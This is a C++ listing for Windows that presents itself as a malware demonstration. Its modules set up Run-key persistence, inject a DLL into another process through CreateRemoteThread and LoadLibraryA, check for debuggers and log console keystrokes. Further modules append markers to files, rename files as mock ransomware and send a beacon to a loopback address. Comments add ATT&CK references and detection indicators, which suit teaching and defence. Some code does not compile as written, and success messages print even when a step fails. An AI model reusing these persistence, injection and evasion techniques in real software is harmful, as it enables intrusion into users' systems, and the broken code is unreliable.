- #include <iostream>
- #include <fstream>
- #include <string>
- #include <vector>
- #include <windows.h>
- #include <winreg.h>
- #include <direct.h>
- #include <filesystem>
- #include <chrono>
- #include <thread>
- #include <winsock2.h>
- #include <ws2tcpip.h>
- #include <Psapi.h>
- #include <TlHelp32.h>
- #include <Shlwapi.h>
- #include <Dbghelp.h>
- #pragma comment(lib, "ws2_32.lib")
- #pragma comment(lib, "Psapi.lib")
- #pragma comment(lib, "Shlwapi.lib")
- #pragma comment(lib, "Dbghelp.lib")
- // Short alias: every module below reaches the filesystem library through `fs`.
- namespace fs = std::filesystem;
- // Module: Persistence
- // Persistence: registers a Run-key autostart entry in the current user's hive
- // (ATT&CK T1547.001). No elevation is needed because the key lives under HKCU.
- class Persistence {
- public:
- // Writes a REG_SZ value named "Malware" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
- // The value points at "malware.exe" in the process's *current working directory*
- // (fs::current_path()), not at the running image, so the autostart target is whatever
- // file sits at that path at logon time.
- // Detection: registry value-set telemetry on the Run key (e.g. Sysmon Event ID 13);
- // the fixed value name "Malware" is itself an indicator.
- static void establish() {
- HKEY hKey;
- std::wstring path = fs::current_path().wstring() + L"\\malware.exe";
- if (RegOpenKeyEx(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
- // Byte count includes the terminating NUL, as REG_SZ requires. The return value of
- // RegSetValueEx is not checked, so the success message below is printed even if the
- // write itself failed — only the key *open* is verified.
- RegSetValueEx(hKey, L"Malware", 0, REG_SZ, (BYTE*)path.c_str(), (DWORD)(path.length() + 1) * sizeof(wchar_t));
- RegCloseKey(hKey);
- std::wcout << L"[+] Persistence established" << std::endl;
- } else {
- std::wcout << L"[!] Failed to establish persistence" << std::endl;
- }
- }
- // Deletes the "Malware" Run value again. As in establish(), only the key open is
- // checked; a failed RegDeleteValue still reports "[+] Removed persistence".
- static void remove() {
- HKEY hKey;
- if (RegOpenKeyEx(HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
- RegDeleteValue(hKey, L"Malware");
- RegCloseKey(hKey);
- std::wcout << L"[+] Removed persistence" << std::endl;
- }
- }
- };
- // Module: File Infection
- // "File infection" here means appending a fixed marker string to every *.txt file in
- // the current working directory; no executable content is written. The literal
- // appended below is a reliable content indicator when scanning for affected files.
- class FileInfection {
- public:
- // Walks the working directory (non-recursively) and appends the marker to each entry
- // whose extension is ".txt". Entries are not checked to be regular files, and files
- // that fail to open are skipped silently.
- // Detection: one process modifying many .txt files in quick succession.
- static void infect() {
- for (const auto & entry : fs::directory_iterator(fs::current_path())) {
- if (entry.path().extension() == ".txt") {
- // Append mode: existing content is preserved, the marker is added at the end.
- std::wofstream file(entry.path(), std::ios::app);
- if (file.is_open()) {
- file << L"\n\n[Malicious payload: This file has been compromised]";
- file.close();
- std::wcout << L"[*] Infected file: " << entry.path().wstring() << std::endl;
- }
- }
- }
- }
- };
- // Module: Data Exfiltration
- // Despite the name, this module performs a local file copy only; no data leaves the
- // host. It stands in for the staging step that would precede actual exfiltration.
- class DataExfiltration {
- public:
- // Copies `source` to `destination`, overwriting any existing file there.
- // @param source       file to stage; reported as missing (no throw) if absent.
- // @param destination  target path; its parent directory must already exist.
- // Note: this copy_file overload (no error_code argument) throws
- // std::filesystem::filesystem_error on failure, e.g. a missing destination
- // directory, and nothing here catches it.
- static void exfiltrate(const fs::path& source, const fs::path& destination) {
- if (fs::exists(source)) {
- fs::copy_file(source, destination, fs::copy_options::overwrite_existing);
- std::wcout << L"[+] Sensitive data exfiltrated to: " << destination.wstring() << std::endl;
- } else {
- std::wcout << L"[!] File for data exfiltration not found" << std::endl;
- }
- }
- };
- // Module: Keylogger
- // Keylogger: polls this process's own console via the CRT functions _kbhit()/_getwch()
- // and appends the characters to "keylog.txt" in the working directory. Because it uses
- // console input rather than a system-wide hook, it only sees keys typed into its own
- // console window.
- class Keylogger {
- private:
- // Append-mode log file; opened in the constructor, closed in the destructor.
- std::wofstream logFile;
- public:
- // Opens (or creates) keylog.txt relative to the current working directory.
- Keylogger() {
- logFile.open("keylog.txt", std::ios::app);
- }
- // The explicit close is redundant (the stream's destructor closes it) but harmless.
- ~Keylogger() {
- if (logFile.is_open()) logFile.close();
- }
- // Polls the console 100 times at 100 ms intervals (about 10 s in total), logging a
- // key only on iterations where one is pending. This is 100 *polls*, not 100
- // keystrokes. Does nothing but print an error if the log file failed to open.
- void start() {
- if (logFile.is_open()) {
- std::wcout << L"[+] Starting keylogger" << std::endl;
- for(int i = 0; i < 100; ++i) { // 100 polls at 100 ms each (not 100 keystrokes)
- if (_kbhit()) {
- wchar_t key = _getwch();
- // Folds ASCII a-z to A-Z; digits, punctuation and non-ASCII are logged as typed.
- if (key >= L'a' && key <= L'z') key = key - 32; // Convert to uppercase
- logFile << key;
- }
- std::this_thread::sleep_for(std::chrono::milliseconds(100));
- }
- std::wcout << L"[+] Keylogger stopped" << std::endl;
- } else {
- std::wcout << L"[!] Failed to start keylogger" << std::endl;
- }
- }
- };
- // Module: C2 Communication
- // C2 beacon: opens one TCP connection to ipAddress:port, sends the fixed string
- // "Malware beacon", and closes. Nothing is read back and there is no command handling.
- // Detection: the plaintext payload "Malware beacon" is a usable network signature.
- class C2Communication {
- public:
- // @param ipAddress  dotted-quad IPv4 string; parsed with inet_addr, whose INADDR_NONE
- //                   failure result is not checked.
- // @param port       TCP port; narrowed to u_short by htons.
- // Every failure path prints a "[!]" line and releases what was acquired so far.
- static void communicate(const std::string& ipAddress, int port) {
- WSADATA wsaData;
- SOCKET ConnectSocket = INVALID_SOCKET;
- // Only the three fields assigned below are initialised; sin_zero is left
- // indeterminate (connect() ignores it).
- struct sockaddr_in clientService;
- if (WSAStartup(MAKEWORD(2,2), &wsaData) != 0) {
- std::wcout << L"[!] Failed to initialize Winsock" << std::endl;
- return;
- }
- ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
- if (ConnectSocket == INVALID_SOCKET) {
- std::wcout << L"[!] Error at socket()" << std::endl;
- WSACleanup();
- return;
- }
- clientService.sin_family = AF_INET;
- clientService.sin_addr.s_addr = inet_addr(ipAddress.c_str());
- clientService.sin_port = htons(port);
- if (connect(ConnectSocket, (SOCKADDR*)&clientService, sizeof(clientService)) == SOCKET_ERROR) {
- std::wcout << L"[!] Failed to connect to C2 server" << std::endl;
- closesocket(ConnectSocket);
- WSACleanup();
- return;
- }
- const char* message = "Malware beacon";
- // The return value of send() is ignored; a short or failed send still prints success.
- send(ConnectSocket, message, strlen(message), 0);
- std::wcout << L"[+] Beacon sent to C2 server" << std::endl;
- closesocket(ConnectSocket);
- WSACleanup();
- }
- };
- // Module: Ransomware Simulation
- // "Ransomware" simulation: no cryptography is involved. encryptFiles() only renames
- // matching files by appending ".encrypted"; decryptFiles() strips that suffix again.
- // File contents are never modified.
- class Ransomware {
- public:
- // Renames every *.docx / *.pdf / *.txt entry in the working directory to
- // <name>.<ext>.encrypted. Whether a directory_iterator observes entries renamed
- // while it is live is unspecified by the standard; since ".encrypted" does not match
- // the filter, a re-visited entry is not renamed twice.
- // Detection: a burst of renames that introduces a single new extension.
- static void encryptFiles() {
- for (const auto & entry : fs::directory_iterator(fs::current_path())) {
- // NOTE(review): std::wstring has no extension() member, so this statement does not
- // compile as written — the listing is a non-building demonstration.
- std::wstring ext = entry.path().wstring().extension();
- if (ext == L".docx" || ext == L".pdf" || ext == L".txt") {
- fs::path encryptedPath = entry.path().wstring() + L".encrypted";
- fs::rename(entry.path(), encryptedPath);
- std::wcout << L"[*] File encrypted: " << entry.path().wstring() << L" -> " << encryptedPath.wstring() << std::endl;
- }
- }
- }
- // Reverses encryptFiles(): drops the trailing 10 characters (".encrypted") from each
- // *.encrypted entry in the working directory. An existing file at the original name
- // is replaced by fs::rename.
- static void decryptFiles() {
- for (const auto & entry : fs::directory_iterator(fs::current_path())) {
- if (entry.path().extension() == ".encrypted") {
- fs::path originalPath = entry.path().wstring().substr(0, entry.path().wstring().length() - 10); // remove .encrypted (10 chars)
- fs::rename(entry.path(), originalPath);
- std::wcout << L"[*] File decrypted for demo: " << entry.path().wstring() << std::endl;
- }
- }
- }
- };
- // Module: Process Injection
- // Process injection: the CreateRemoteThread + LoadLibraryA pattern (ATT&CK T1055.001).
- // The target is located by executable name through a Toolhelp process snapshot; only
- // the first match is used.
- class ProcessInjection {
- public:
- // @param targetProcessName  executable name compared against szExeFile with strcmp
- //                           (case-sensitive, narrow); see the note at that line.
- // @param dllPath            narrow path copied into the target and handed to
- //                           LoadLibraryA there, so it is resolved in the target's context.
- // Reporting: "[+] DLL injected" is printed unconditionally — also when no process
- // matched or any step below failed.
- // Detection: OpenProcess with PROCESS_ALL_ACCESS followed by VirtualAllocEx /
- // WriteProcessMemory / CreateRemoteThread across a process boundary (e.g. Sysmon
- // Event IDs 10 and 8), plus an image load in the target from a non-system path.
- static void inject(const char* targetProcessName, const char* dllPath) {
- HANDLE hProcess = NULL, hThread = NULL;
- // The *local* address of LoadLibraryA is reused as the remote start routine; this
- // assumes kernel32.dll is mapped at the same base in both processes. Neither
- // lookup result is NULL-checked.
- HMODULE hKernel32 = GetModuleHandleA("kernel32.dll");
- LPVOID pLoadLibrary = (LPVOID)GetProcAddress(hKernel32, "LoadLibraryA");
- PROCESSENTRY32 pe32;
- pe32.dwSize = sizeof(PROCESSENTRY32);
- HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
- if (hSnapshot == INVALID_HANDLE_VALUE) return;
- if (Process32First(hSnapshot, &pe32)) {
- do {
- // NOTE(review): szExeFile follows the TCHAR setting. The L"..." literals used with
- // TCHAR APIs elsewhere in this listing imply a UNICODE build, in which szExeFile is
- // WCHAR[] and this strcmp does not compile.
- if (strcmp(pe32.szExeFile, targetProcessName) == 0) {
- hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
- if (hProcess) {
- // Remote buffer for the DLL path (NUL included), committed read/write.
- LPVOID pRemoteString = VirtualAllocEx(hProcess, NULL, strlen(dllPath) + 1, MEM_COMMIT, PAGE_READWRITE);
- if (pRemoteString) {
- // Return value unchecked; a partial write would pass an invalid path on.
- WriteProcessMemory(hProcess, pRemoteString, (LPVOID)dllPath, strlen(dllPath) + 1, NULL);
- // New thread in the target starting at LoadLibraryA with the path as argument.
- hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, pRemoteString, 0, NULL);
- if (hThread) {
- // Blocks until LoadLibraryA returns in the target, then frees the path buffer.
- WaitForSingleObject(hThread, INFINITE);
- VirtualFreeEx(hProcess, pRemoteString, 0, MEM_RELEASE);
- }
- }
- CloseHandle(hProcess);
- }
- break; // first matching process only
- }
- } while (Process32Next(hSnapshot, &pe32));
- }
- CloseHandle(hSnapshot);
- if (hThread) CloseHandle(hThread);
- std::wcout << L"[+] DLL injected into " << targetProcessName << std::endl;
- }
- };
- // Module: Anti-Debugging
- // Anti-debugging: polls IsDebuggerPresent() once per second on a background thread and
- // terminates the whole process if a user-mode debugger is attached.
- class AntiDebugging {
- public:
- // Thin wrapper over the Win32 call; reports a user-mode debugger attached to *this*
- // process only.
- static bool isDebuggerPresent() {
- return IsDebuggerPresent();
- }
- // Exits the process with status 1 when a debugger is detected. main() runs this on a
- // detached thread, so exit() — and the static destructors it triggers — can fire while
- // the main thread is mid-operation.
- static void checkForDebuggers() {
- if (isDebuggerPresent()) {
- std::wcout << L"[!] Debugger detected, exiting..." << std::endl;
- exit(1);
- }
- }
- // Never returns; meant to run on its own thread. Uses Win32 Sleep here, whereas the
- // keylogger uses std::this_thread::sleep_for for the same purpose.
- static void antiDebuggingLoop() {
- while (true) {
- checkForDebuggers();
- Sleep(1000); // Check every second
- }
- }
- };
- // Module: Privilege Escalation Check
- // Privilege *check* only — nothing here escalates. Tests whether the caller's effective
- // token is a member of BUILTIN\Administrators.
- class PrivilegeEscalation {
- public:
- // @return true if the current token (the thread's impersonation token, else the
- //         process token, since NULL is passed) holds Administrators as an enabled
- //         group. Under a UAC-filtered, non-elevated admin token the group is present
- //         for deny-only and this returns false. CheckTokenMembership's own return
- //         value is not checked; on failure isAdmin simply stays FALSE.
- static bool isAdmin() {
- BOOL isAdmin = FALSE;
- PSID AdministratorsGroup;
- SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
- // Builds S-1-5-32-544 (BUILTIN\Administrators) from the NT authority and two RIDs.
- if (AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup)) {
- CheckTokenMembership(NULL, AdministratorsGroup, &isAdmin);
- FreeSid(AdministratorsGroup);
- }
- return isAdmin;
- }
- };
- // Entry point: runs each module once, in sequence, against the current working
- // directory and loopback, then reverts the persistence, rename and copy steps. The
- // marker appended by infect() and the keylog.txt file are not reverted.
- int main() {
- std::wcout << L"[!] Running Malware Demonstration" << std::endl;
- // Check for admin rights (report only; nothing is elevated)
- if (PrivilegeEscalation::isAdmin()) {
- std::wcout << L"[+] Running with admin rights" << std::endl;
- } else {
- std::wcout << L"[+] Running without admin rights" << std::endl;
- }
- // Anti-Debugging: detached thread that may call exit(1) at any point below
- std::thread antiDebugThread(AntiDebugging::antiDebuggingLoop);
- antiDebugThread.detach();
- // Persistence: HKCU Run value pointing at <cwd>\malware.exe
- Persistence::establish();
- // File Infection: appends the marker to *.txt in the cwd (not undone in cleanup)
- FileInfection::infect();
- // Data Exfiltration: local copy into C:\temp; throws if that directory is missing
- DataExfiltration::exfiltrate("sensitive_data.txt", "C:\\temp\\stolen_data.txt");
- // Keylogger: ~10 s of console polling; keylog.txt is left behind
- Keylogger keylogger;
- keylogger.start();
- // C2 Communication: a single beacon to loopback in this demo
- C2Communication::communicate("127.0.0.1", 4444); // loopback:4444 is the beacon target in this listing
- // Ransomware: rename-only, reversed below by decryptFiles()
- Ransomware::encryptFiles();
- // Process Injection: target name and DLL path are placeholders in this listing
- ProcessInjection::inject("notepad.exe", "C:\\path\\to\\your\\dll.dll"); // placeholder DLL path
- // Clean up: Run value, renames and the copied file are reverted; the infect() marker
- // and keylog.txt are not.
- Persistence::remove();
- Ransomware::decryptFiles();
- fs::remove(L"C:\\temp\\stolen_data.txt");
- std::wcout << L"[+] Cleaned up operations" << std::endl;
- return 0;
- }